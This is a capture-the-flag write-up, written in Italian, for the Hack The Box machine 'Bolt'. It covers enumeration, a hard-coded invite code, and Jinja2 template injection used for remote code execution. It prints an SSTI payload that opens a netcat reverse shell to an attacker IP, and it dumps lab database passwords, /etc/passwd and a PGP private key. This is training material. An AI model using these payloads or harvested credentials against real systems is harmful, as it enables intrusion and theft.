HTB - Bolt


1 Enumeration

1.1 nmap

1.1.1 nmap -sC -sV bolt


Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 04:53 CEST
Nmap scan report for bolt (10.129.119.38)
Host is up (0.056s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
|   256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_  256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title:     Starter Website -  About 
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
| http-title: Passbolt | Open source password manager for teams
|_Requested resource was /auth/login?redirect=%2F
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stat
eOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after:  2022-02-24T19:11:23
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds

1.1.2 nmap -p- bolt


Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 04:53 CEST
Nmap scan report for bolt (10.129.119.38)
Host is up (0.059s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 25.47 seconds

1.2 gobuster

1.2.1 leo@kali:~/repos/bolt$ gobuster vhost -u bolt.htb -w ~/repos/SecLists/Discovery/DNS/subdomains-top1million-110000.txt

==============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://bolt.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /home/leo/repos/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/03/31 05:05:22 Starting gobuster in VHOST enumeration mode
===============================================================
Found: mail.bolt.htb (Status: 200) [Size: 4943]
Found: demo.bolt.htb (Status: 302) [Size: 219] 
Progress: 2643 / 114442 (2.31%)               ^C
[!] Keyboard interrupt detected, terminating.
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x773b15]

goroutine 26 [running]:
github.com/OJ/gobuster/gobustervhost.(*GobusterVhost).Run(0xc000012840, 0xc00001b100, 0x8, 0xc000064240, 0x1, 0x0)
        github.com/OJ/gobuster/gobustervhost/gobustervhost.go:125 +0x255
github.com/OJ/gobuster/libgobuster.(*Gobuster).worker(0xc0000128a0, 0xc000090300, 0xc0000aa080)
        github.com/OJ/gobuster/libgobuster/libgobuster.go:91 +0x1de
created by github.com/OJ/gobuster/libgobuster.(*Gobuster).Start
        github.com/OJ/gobuster/libgobuster/libgobuster.go:158 +0x16a
    

1.3 docker files

Enumerando i file ottenuti scaricando image.tar dal sito http://bolt ho trovato la cartella

   41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad/app/base

che contiene il file app/base/routes.py, e, in particolare, nel metodo register() è presente il seguente codice di invito hard-coded

   XNSS-HSJW-3NGU-8XTJ

come possiamo vedere dal codice della funzione, mettendo questo codice siamo in grado di iscriverci alla piattaforma.

@blueprint.route('/register', methods=['GET', 'POST'])
def register():
    login_form = LoginForm(request.form)
    create_account_form = CreateAccountForm(request.form)
    if 'register' in request.form:

        username  = request.form['username']
        email     = request.form['email'   ]
        code      = request.form['invite_code']
        if code != 'XNSS-HSJW-3NGU-8XTJ':
            return render_template('code-500.html')
        data = User.query.filter_by(email=email).first()
        if data is None and code == 'XNSS-HSJW-3NGU-8XTJ':
            # Check usename exists
            user = User.query.filter_by(username=username).first()
            if user:
                return render_template( 'accounts/register.html', 
                                    msg='Username already registered',
                                    success=False,
                                    form=create_account_form)

            # Check email exists
            user = User.query.filter_by(email=email).first()
            if user:
                return render_template( 'accounts/register.html', 
                                    msg='Email already registered', 
                                    success=False,
                                    form=create_account_form)

            # else we can create the user
            user = User(**request.form)
            db.session.add(user)
            db.session.commit()

            return render_template( 'accounts/register.html', 
                                msg='User created please <a href="/login">login</a>', 
                                success=True,
                                form=create_account_form)

    else:
        return render_template( 'accounts/register.html', form=create_account_form)

1.4 SSTI

Modificando il profilo dell'utente in demo.bolt.htb, e successivamente, confermando in mail.bolt.htb siamo in grado di ottenere una RCE tramite una SSTI con il seguente payload

   {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

Per una reverse shell eseguiamo il seguente payload

   {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.14.5 4321 >/tmp/f   ').read() }}

2 PrivEsc

2.1 Misc

2.1.1 www-data@bolt:~/demo$ cat config.py

cat config.py
"""Flask Configuration"""
#SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
SQLALCHEMY_DATABASE_URI = 'mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'kreepandcybergeek'
MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
#MAIL_DEBUG = app.debug
MAIL_USERNAME = None
MAIL_PASSWORD = None
DEFAULT_MAIL_SENDER = 'support@bolt.htb'

2.1.2 roundcubeuser db

    $config['db_dsnw'] = 'mysql://roundcubeuser:WXg5He2wHt4QYHuyGET@localhost/roundcube';

2.1.3 www-data@bolt:~/roundcube/config$ cat /etc/passwd

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
vboxadd:x:998:1::/var/run/vboxadd:/bin/false
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
mysql:x:127:133:MySQL Server,,,:/nonexistent:/bin/false
clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash
postfix:x:128:134::/var/spool/postfix:/usr/sbin/nologin
vmail:x:5000:5000::/var/mail:/usr/bin/nologin
dovecot:x:129:136:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:130:137:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin    

2.1.4 ps aux

root         454  0.0  0.0  85132   288 ?        Ssl  20:36   0:00 vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_permissions,allow_other,dev,suid
root         518  0.0  0.0      0     0 ?        I<   20:36   0:00 [cryptd]
systemd+     559  0.0  0.1  90260  5980 ?        Ssl  20:36   0:00 /lib/systemd/systemd-timesyncd
root         562  0.0  0.0      0     0 ?        I<   20:36   0:00 [nfit]
root         592  0.0  0.2  58776 10508 ?        Ss   20:36   0:00 /usr/bin/VGAuthService
root         599  0.0  0.0   2548   716 ?        Ss   20:36   0:00 /usr/sbin/acpid
avahi        607  0.0  0.0   8532  3440 ?        Ss   20:36   0:01 avahi-daemon: running [bolt.local]
root         612  0.0  0.0  18052  2968 ?        Ss   20:36   0:00 /usr/sbin/cron -f
message+     619  0.0  0.1   7924  4716 ?        Ss   20:36   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         622  0.0  0.4 270316 18940 ?        Ssl  20:36   0:00 /usr/sbin/NetworkManager --no-daemon
root         635  0.0  0.1  99904  6004 ?        Ssl  20:36   0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leas
root         641  0.0  0.0  81968  3608 ?        Ssl  20:36   0:00 /usr/sbin/irqbalance --foreground
root         642  0.0  0.5  47968 20092 ?        Ss   20:36   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         645  0.0  0.1 232724  6684 ?        Ssl  20:36   0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog       659  0.0  0.1 224328  5228 ?        Ssl  20:36   0:00 /usr/sbin/rsyslogd -n -iNONE
root         673  0.0  0.1  16484  5504 ?        Ss   20:36   0:00 /lib/systemd/systemd-logind
root         675  0.0  0.1  13688  4844 ?        Ss   20:36   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root         683  0.1  0.2 249016  8524 ?        Ssl  20:36   0:07 /usr/bin/vmtoolsd
avahi        687  0.0  0.0   8352   324 ?        S    20:36   0:00 avahi-daemon: chroot helper
root         761  0.0  0.2 314448 10876 ?        Ssl  20:36   0:00 /usr/sbin/ModemManager
systemd+     834  0.0  0.3  24056 12888 ?        Ss   20:36   0:00 /lib/systemd/systemd-resolved
www-data     897  0.0  0.5  41296 22424 ?        Ss   20:36   0:00 /usr/bin/python3 /usr/local/bin/gunicorn wsgi:app
root         898  0.0  0.0   4544  3356 ?        Ss   20:36   0:00 /usr/sbin/dovecot -F
www-data     899  0.0  0.5  41296 22412 ?        Ss   20:36   0:00 /usr/bin/python3 /usr/local/bin/gunicorn wsgi:app
root         903  0.0  0.9 251708 38204 ?        Ss   20:36   0:00 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
whoopsie     910  0.0  0.3 400564 15572 ?        Ssl  20:36   0:00 /usr/bin/whoopsie -f
kernoops     915  0.0  0.0  11264   452 ?        Ss   20:36   0:00 /usr/sbin/kerneloops --test
root         922  0.0  0.1  12184  7316 ?        Ss   20:36   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
dovecot      930  0.0  0.0   4256  1128 ?        S    20:36   0:00 dovecot/anvil
root         931  0.0  0.0   4396  2984 ?        S    20:36   0:00 dovecot/log
root         933  0.0  0.1   5684  4172 ?        S    20:36   0:00 dovecot/config
kernoops     934  0.0  0.0  11264   452 ?        Ss   20:36   0:00 /usr/sbin/kerneloops
root         940  0.0  0.0  65664  1672 ?        Ss   20:36   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data     942  0.0  0.2  66772  8772 ?        S    20:36   0:00 nginx: worker process
www-data     943  0.0  0.2  67204  9000 ?        S    20:36   0:02 nginx: worker process
root         944  0.0  0.0  17068  1828 tty1     Ss+  20:36   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
www-data     954  0.0  1.0 252868 43084 ?        S    20:36   0:01 php-fpm: pool www
www-data     955  0.0  1.0 252860 43468 ?        S    20:36   0:00 php-fpm: pool www
mysql       1010  0.3 10.2 1759136 407364 ?      Ssl  20:36   0:14 /usr/sbin/mysqld
www-data    1059  0.1  1.1  78448 44380 ?        S    20:36   0:05 /usr/bin/python3 /usr/local/bin/gunicorn wsgi:app
root        1273  0.0  0.0  38044  3416 ?        Ss   20:36   0:00 /usr/lib/postfix/sbin/master -w
postfix     1274  0.0  0.1  38312  5212 ?        S    20:36   0:00 pickup -l -t unix -u -c
postfix     1275  0.0  0.1  38508  5316 ?        S    20:36   0:00 qmgr -l -t unix -u
www-data    2070  0.0  0.0  78236   884 ?        Ss   20:53   0:00 gpg-agent --homedir /var/lib/passbolt/.gnupg --use-standard-socket --daemon
dovecot     2483  0.0  0.0   4392  2864 ?        S    21:08   0:00 dovecot/stats
root        2550  0.0  0.0      0     0 ?        I    21:09   0:00 [kworker/1:0-events]
dovecot     3022  0.0  0.1  20304  7968 ?        S    21:31   0:00 dovecot/auth
root        3047  0.0  0.0      0     0 ?        I    21:32   0:00 [kworker/0:0-events]
root        3349  0.0  0.0      0     0 ?        I    21:39   0:00 [kworker/1:1-mm_percpu_wq]
root        3352  0.0  0.0      0     0 ?        I    21:39   0:00 [kworker/u256:1-ext4-rsv-conversion]
root        3513  0.0  0.0      0     0 ?        I    21:44   0:00 [kworker/u256:0-events_unbound]
www-data    3682  0.0  0.0   2616   540 ?        S    21:49   0:00 /bin/sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.14.5 4321 >/tmp/f   
www-data    3685  0.0  0.0  16860   588 ?        S    21:49   0:00 cat /tmp/f
www-data    3686  0.0  0.0   2616   604 ?        S    21:49   0:00 /bin/sh -i
www-data    3687  0.0  0.0   3340  2004 ?        S    21:49   0:00 /bin/nc 10.10.14.5 4321
www-data    3689  0.0  0.2  26384  8944 ?        S    21:49   0:00 python3 -c import pty; pty.spawn("/bin/bash")
www-data    3690  0.0  0.1  18476  3992 pts/0    Ss   21:49   0:00 /bin/bash
www-data    3692  0.0  0.9  67480 38708 ?        S    21:49   0:00 /usr/bin/python3 /usr/local/bin/gunicorn wsgi:app
root        3823  0.0  0.2  20476 10084 ?        S    21:53   0:00 dovecot/auth -w
www-data    3853  0.0  0.0  20132  3240 pts/0    R+   21:54   0:00 ps aux    

2.1.5 www-data@bolt:/var/lib$ find / -name "passbolt" 2>/dev/null

find / -name "passbolt" 2>/dev/null
/etc/passbolt
/usr/share/php/passbolt
/usr/share/passbolt
/var/lib/passbolt
/var/log/passbolt    

2.1.6 grep -nr 'password' /etc/passbolt

    'App' => [
        // A base URL to use for absolute links.
        // The url where the passbolt instance will be reachable to your end users.
        // This information is need to render images in emails for example
        'fullBaseUrl' => 'https://passbolt.bolt.htb',
    ],

    // Database configuration.
    'Datasources' => [
        'default' => [
            'host' => 'localhost',
            'port' => '3306',
            'username' => 'passbolt',
            'password' => 'rT2;jW7<eY8!dX8}pQ8%',
            'database' => 'passboltdb',
        ],
    ],
    

2.1.7 eddie@bolt:~$ grep -nr -- '-----BEGIN PGP PRIVATE KEY BLOCK-----' .

./.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js:27039:const PRIVATE_HEADER = '-----BEGIN PGP PRIVATE KEY BLOCK-----';
./.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js:32409:      result.push("-----BEGIN PGP PRIVATE KEY BLOCK-----\r\n");
Binary file ./.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log matches
./private.key:1:-----BEGIN PGP PRIVATE KEY BLOCK-----    

2.1.8 home/eddie.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log

"passbolt-private-gpgkeys":"{\"MY_KEY_ID\":{\"key\":\"-----BEGIN PGP PRIVATE KEY BLOCK-----\\r\\nVersion: OpenPGP.js v4.10.9\\r\\nComment: https://openpgpjs.org\\r\\n\\r\\n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\\r\\nPSwYYWlAywj5\\r\\n=cqxZ\\r\\n-----END PGP PRIVATE KEY BLOCK-----\\r\\n\"    

2.2 database (passbolt)

   mysql -u passbolt -h localhost -p

da utilizzare con la seguente password

   rT2;jW7<eY8!dX8}pQ8%

2.2.1 mysql> select * from users;

select * from users;
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+
| id                                   | role_id                              | username       | active | deleted | created             | modified            |
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+
| 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | eddie@bolt.htb |      1 |       0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 |
| 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 | clark@bolt.htb |      1 |       0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 |
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+
2 rows in set (0.00 sec)    

2.2.2 mysql> show tables;

show tables;
+-----------------------+
| Tables_in_passboltdb  |
+-----------------------+
| account_settings      |
| action_logs           |
| actions               |
| authentication_tokens |
| avatars               |
| comments              |
| email_queue           |
| entities_history      |
| favorites             |
| gpgkeys               |
| groups                |
| groups_users          |
| organization_settings |
| permissions           |
| permissions_history   |
| phinxlog              |
| profiles              |
| resource_types        |
| resources             |
| roles                 |
| secret_accesses       |
| secrets               |
| secrets_history       |
| user_agents           |
| users                 |
+-----------------------+
25 rows in set (0.00 sec)    

2.2.3 mysql> select * from gpgkeys\G

#+begin_example select * from gpgkeys\G

2.2.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 1. row *

id: 2d9d331a-9c6d-4f7a-a423-27fed47176c9 user_id: 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 armored_key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: OpenPGP.js v4.10.9 Comment: https://openpgpjs.org

xsBNBGA4GX0BCAD2MdBV19tAu+SWkMJ0BkvGdQrLquHg1olUvvhvIWmmBICr eA89HnYYKFoOxnCL1yhpArtf379rFTZJDXzbzXlnCvgZzP71MNYo2Pq3l0Zn syfx3juIg+Fr6YYv7RotnpNaz+xFU+eHVSFRl64o+WhuxETPyJKqpRGGYjrl WiQQP8oCGSh5ytXqK/XRswETTQEQUTkeWHVU5UV6KlYp+xL0vmu8R9UAkcrK Go9QusV+v4i3PMsgHexuOFHXVJ5nmyGvVQ5khNtuNHruQ5M3xjsb8FtklIo1 asfbjJETUti0wYf7lOffU3+0win4uDbMDOUJEU1ZV//Z+OZq+ARBWaahABEB AAHNH0NsYXJrIEdyaXN3b2xkIDxjbGFya0Bib2x0Lmh0Yj7CwI0EEAEIACAF AmA4GX0GCwkHCAMCBBUICgIEFgIBAAIZAQIbAwIeAQAhCRBY7n73qDZg6hYh BA0fEAb51vFT6RQogFjufveoNmDqjx8IAI+HW1qYWqFhO5VdgDjZLlyFzQgh CPMjix05N8U6umsy31m0U8OaDCwN+s0S5DAz0e5OSJEF/gNVM/iTP8Ac+gwo H2kIEUZ6cPMLgV1kwiGAQUr/Fn0biCmKQo36luQphSdT1Gbv+fOpcrLFh+bZ EndJIgKdovUrr3eo7gyJhALzrYz9PinypoQPs6t3PXKbRWdhHulQuBZPUavH 2g6knhGnx8P2XGEbELGh2NmmB9K1B9vpjxpGokZGiVXAA00/T4rj22/fXHJO XXFzSjoIpnPCjBozgeWtiwDwD5zFh4rg7NkcyZFwg2BZo3fFKXBENWlOIy9b ejRn7ea1iTbK4BLOwE0EYDgZfQEIALhlzquF2jgQJkBFUC0PvpaYBNMtinA5 SiA+rKMs+qhsfJf9whelroGL4znwOw4yI+gCIdiX+qlGyxPD1LXVCHWyaTA3 fiivImGkEXV2pP3CvBjtzsYv4g9rlrXmoOrhwnhJUxcq/0D8HinpbIwQ8euM jTCfLVCBPOLham/D/j7QLydZ0flA+z3SKJMrbx5MlhlGj2PwxWdOLII7xTol 1B7F5WUz/ILKhCkzSliiRAHJhQNlgZHV3bCHGR1YUDf30pvn9GEwbOE2DdUv 